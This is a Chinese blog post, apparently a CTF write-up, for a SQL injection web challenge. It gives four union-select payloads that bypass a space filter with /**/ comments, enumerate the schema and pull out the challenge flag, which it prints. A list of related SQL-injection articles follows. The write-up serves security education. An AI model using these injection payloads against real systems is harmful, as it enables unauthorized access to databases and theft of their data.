[CTF]简单的sql注入之2

最新推荐文章于 2024-05-13 12:00:00 发布
最新推荐文章于 2024-05-13 12:00:00 发布
阅读量641 收藏 1
点赞数 1
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alex_bean/article/details/93754383
版权

类型:web
网址:http://www.shiyanbar.com/ctf/1908
攻击:sql注入
一句话总结:
id有回显的sql注入(手工)

Writeup:

测试发现过滤空格,用/**/代替空格

爆数据库名称:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果:web1

爆数据表名称:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/and/**/'1'='1

结果三个表,分别是baloteli、flag、web_1

爆flag表字段:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='web1'/**/and/**/table_name='flag'/**/and/**/'1'='1

结果三个字段,分别是baloteli、flag、id

爆flag表flag字段的数据:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据,分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}

胖胖のALEX
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入ctf_CTFSQL注入详解
weixin_29117805的博客
01-20 906
前言:最近打算玩一下CTF,玩过CTF的都知道SQL注入CTF中最重要的题型。但是。。。。。。。。。很多大佬的WP都是一阵操作猛如虎。很多都不带解释的(大佬觉得简单所以就不解释了=_= =_= =_=)。所以这几天一直都在看关于SQL注入的文章,一直也不理解SQL注入的原理。今天刚好看到了一篇文章,自己也跟着那个博主的思路总结一下,对SQL注入有了一个大概的的理解。写这篇博文一是希望加深自己对S...
CTFSQL注入常见题型整理.pdf
02-11
在网络安全竞赛(CTF)中,SQL注入是常见的攻击手法之一。通过对网站输入的数据进行构造,攻击者可以利用SQL注入漏洞获取敏感数据,甚至控制整个数据库。本文将详细介绍CTF中常见的SQL注入题型及其解决方法。 #### ...
ctf php sql注入,CTF WEB SQL注入 writeups
weixin_35076990的博客
03-17 461
尝试了字符型、数字型注入,无果。使用burpsuite 进行爆破。使用 simple list 中的 sql 注入清单进行测试。intruder用法手工测试发现输入数字后都会出现(有wp说这种输出都是 var_dump() 函数输出的结果)。发现过滤了很多关键字,类似 delete、update等。结果出现 Too long,Nonono 、或者什么都没有显示。输入数字 1 时候的回显:Array...
CTF-SQL注入总结
SWC0619的博客
03-11 8256
SQL注入总结(一)
SQL注入简单实例
最新发布
Runnymmede的博客
05-13 917
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句添加额外的SQL语句,从而实现非法操作,获取数据库数据,服务器提权等,很多机构将SQL注入作为第一危险的安全漏洞。
CTF——sql注入之堆叠注入整理
weixin_51735061的博客
03-04 5694
sql注入中的堆叠注入的整理。整理基于“强网杯2019随便注”
CTFSQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
CTF-SQL注入
weixin_44770698的博客
06-16 5072
CTF-SQL注入题目整理
ctf web练习之SQL注入
weixin_51614848的博客
04-19 579
1.首先看题目像SQL注入,于是用burpsuit抓包。针对数据库web2(与题目名字一致)再爆表名,使用指令。备注:本文仅供自用,如有错误,欢迎指出。得到列名,再对列进行爆破,使用指令。把以上所有内容复制到1.txt中。2.使用sqlmap,使用指令。
CTF-Web(2)SQL注入
大表哥的博客
10-26 520
1.注入介绍1.注入介绍1.目标存在sql注入漏洞,且已经获取目标的绝对路径2.并且通过探测发现目标能够进行数据的导入和导出操作,即secure_file_priv为空3.当前数据库是(即dba权限)4.利用Into outfile() (写入文件的函数),向指定路径写入一句话木马5.webshell连接工具连接一句话木马,成功获得权限区别:手工注入需要手动输入参数判断注入点,盲注则利用脚本、自动化工具爆破。
CTF入门之SQL注入
PolarPeak的博客
12-08 2185
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF-SQL注入入门题型
PolarPeak的博客
12-14 5442
CTF SQL注入
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
SQL注入漏洞演示源代码
07-15
了解并实践这些概念对于任何Web开发者来说都是至关重要的,因为SQL注入是常见的攻击手段之一。通过这个演示源代码,你可以亲手操作,更直观地理解这个过程,并提高自己的安全编程技能。同时,这个示例也提醒我们,...
[渗透]Apache Tomcat示例目录漏洞
胖胖的ALEX
02-21 4万+
漏洞等级:中 Apache Tomcat默认安装包含"/examples"目录,该目录包含许多示例servlet和JSP。其中一些示例存在安全风险,不应部署在生产服务器上。 http://localhost:8080/examples/servlets/servlet/SessionExample 示例允许会话操作。因为会话是全局的,所以这个示例会带来很大的安全风险,因为攻击者可用通过操纵其会话来...
[渗透]kindeditor4.1.5文件上传漏洞
胖胖的ALEX
03-04 1万+
漏洞等级:高危 Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 漏洞描述: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP...
[渗透]缓慢的HTTP拒绝服务攻击原理、利用和防范
胖胖的ALEX
02-18 1万+
Slow HTTP Denial of Service Attack 缓慢的HTTP拒绝服务攻击 TCP三次握手: 攻击原理: 对任何一个开放了http访问的服务器,先建立一个连接,指定一个比较大的content-length,然后以非常低的速度发包,比如1-10s发一个字节,然后维持这个连接不断开。如果客户端持续建立这样的连接,那么服务器的可用连接将一点一点被占满,从而导致拒绝服务。 和CC...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值